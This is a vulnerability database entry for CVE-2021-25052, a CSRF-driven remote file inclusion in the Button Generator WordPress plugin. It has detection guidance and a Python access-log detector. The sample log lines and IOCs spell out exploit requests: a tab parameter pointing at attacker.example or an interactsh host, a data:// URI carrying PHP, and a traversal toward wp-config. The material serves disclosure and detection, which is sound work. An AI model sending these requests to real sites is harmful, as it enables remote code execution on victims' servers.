cbcvebase.
CVE-2021-25052
published 2022-01-10


Priority: P3 (54) · Severity: high · CVSS 3.1 base score: 8.8
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 3.53% (87.8th percentile)
The Button Generator WordPress plugin before 2.3.3 lets the wow-company admin menu page include() an arbitrary file with a PHP extension (and also paths using the data:// or http:// stream wrappers), so an attacker who can make an administrator load a crafted admin URL (CSRF) achieves remote code execution.

Affected (1 range)

Vendor: wow-company · Product: button_generator · Version range: < 2.3.3 · Fixed in: 2.3.3

Detection & IOCs (extracted from sources)

URL: /wp-admin/admin.php?page=wow-company&tab=http://{{interactsh-url}}/
Path: /wp-admin/admin.php?page=wow-company&tab=
  • Look for GET requests to /wp-admin/admin.php whose query string carries page=wow-company and a tab= value containing an external URL (http://, https://) or a data:// URI; either indicates a remote file inclusion attempt.
  • The public exploit flow has two steps: a POST to /wp-login.php that authenticates, followed by a GET to /wp-admin/admin.php?page=wow-company&tab=<remote_url>. Correlate login events with subsequent abuse of the wow-company tab parameter from the same client.
  • Flag any request in which the 'tab' query parameter of the wow-company admin page begins with data://, http://, or https://. The advisory names http:// and data:// explicitly; https:// is served by the same PHP URL wrapper and should be treated identically.
  • Because the page will include() any file with a .php extension, not only remote resources, also flag tab values containing directory traversal sequences (../) or absolute paths. These attempts leave no outbound connection and would be missed by a scheme-only rule.
  • Exploitation requires the victim to be authenticated as an admin-level WordPress user, or to be tricked into issuing the request via CSRF; unauthenticated exploitation is not directly possible without a CSRF vector. A CSRF-driven request originates from the administrator's own browser, so a recent login from the same IP is supporting evidence, not a requirement for alerting.
  • Only Button Generator plugin versions before 2.3.3 are affected; version 2.3.3 and later are patched.
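The detection guidance above, turned into a small log-scanning routine. This is an added example written for this page, not a rule shipped by the plugin vendor or the advisory source. It parses combined-format web access log lines (the sample lines are constructed, with RFC 5737 test addresses and an attacker host of attacker.example), flags GET /wp-admin/admin.php?page=wow-company requests whose tab value starts with an http://, https:// or data:// scheme or contains a traversal sequence, and tags each alert with whether the same client IP POSTed to /wp-login.php within the preceding five minutes. The five-minute window and the alert field names are choices made for this example.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (combined log format); not real traffic.
# Line 2 is the documented two-step flow: login, then RFI via the tab parameter.
# Line 3 is a data:// inclusion (URL-encoded "<?php phpinfo();?>") with no prior login.
# Line 4 is benign; line 5 is a local .php inclusion attempt via traversal.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Jan/2022:10:14:02 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "curl/7.79"
203.0.113.7 - - [12/Jan/2022:10:14:05 +0000] "GET /wp-admin/admin.php?page=wow-company&tab=http://attacker.example/ HTTP/1.1" 200 512 "-" "curl/7.79"
198.51.100.4 - - [12/Jan/2022:10:20:11 +0000] "GET /wp-admin/admin.php?page=wow-company&tab=data://text/plain,%3C%3Fphp%20phpinfo()%3B%3F%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.9 - - [12/Jan/2022:10:25:30 +0000] "GET /wp-admin/admin.php?page=wow-company&tab=settings HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
192.0.2.9 - - [12/Jan/2022:10:26:00 +0000] "GET /wp-admin/admin.php?page=wow-company&tab=..%2F..%2F..%2Fwp-config HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Combined log format: client IP, identd, user, [timestamp], "METHOD target PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Stream wrappers named in the advisory (http://, data://) plus https://, which PHP
# serves through the same http wrapper.
REMOTE_SCHEME = re.compile(r'^(?:https?|data):', re.IGNORECASE)


def classify_tab(tab):
    """Return a reason tag if the decoded tab value looks like an include() abuse, else None."""
    if REMOTE_SCHEME.match(tab):
        return "remote-scheme"
    # The page includes any *.php file, so traversal / absolute paths matter too.
    if "../" in tab or "..\\" in tab or tab.startswith("/"):
        return "local-traversal"
    return None


def parse_line(line):
    """Parse one combined-format log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    return rec


def detect(log_text, login_window=timedelta(minutes=5)):
    """Scan access-log text and return a list of alert dicts.

    An alert is raised for GET /wp-admin/admin.php with page=wow-company and a
    suspicious tab value. recent_login is True when the same client IP POSTed to
    /wp-login.php within login_window beforehand (supporting evidence only: a
    CSRF-driven request comes from the victim admin's browser, whose login may be old).
    """
    last_login = {}  # client IP -> timestamp of its most recent POST /wp-login.php
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"] == "/wp-login.php":
            last_login[rec["ip"]] = rec["ts"]
            continue
        if rec["path"] != "/wp-admin/admin.php":
            continue
        if rec["query"].get("page", [""])[0] != "wow-company":
            continue
        for tab in rec["query"].get("tab", []):
            reason = classify_tab(tab)
            if reason is None:
                continue
            login_ts = last_login.get(rec["ip"])
            recent = login_ts is not None and timedelta(0) <= rec["ts"] - login_ts <= login_window
            alerts.append({
                "ip": rec["ip"],
                "ts": rec["ts"].isoformat(),
                "tab": tab,
                "reason": reason,
                "recent_login": recent,
                "status": int(rec["status"]),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Running the block against the sample yields three alerts: the interactsh-style remote include from 203.0.113.7 (with a login three seconds earlier), the data:// include from 198.51.100.4, and the traversal attempt from 192.0.2.9; the benign tab=settings request produces nothing. Because parse_qs percent-decodes values, an attacker encoding the scheme or the ../ sequence does not evade the check, but double encoding or alternative separators would, so treat this as a starting point for a WAF or SIEM rule rather than a complete one.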

CVSS provenance

NVD, CVSS v3.1: 8.8 HIGH (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
NVD, CVSS v2.0: 5.1 MEDIUM (AV:N/AC:H/Au:N/C:P/I:P/A:P)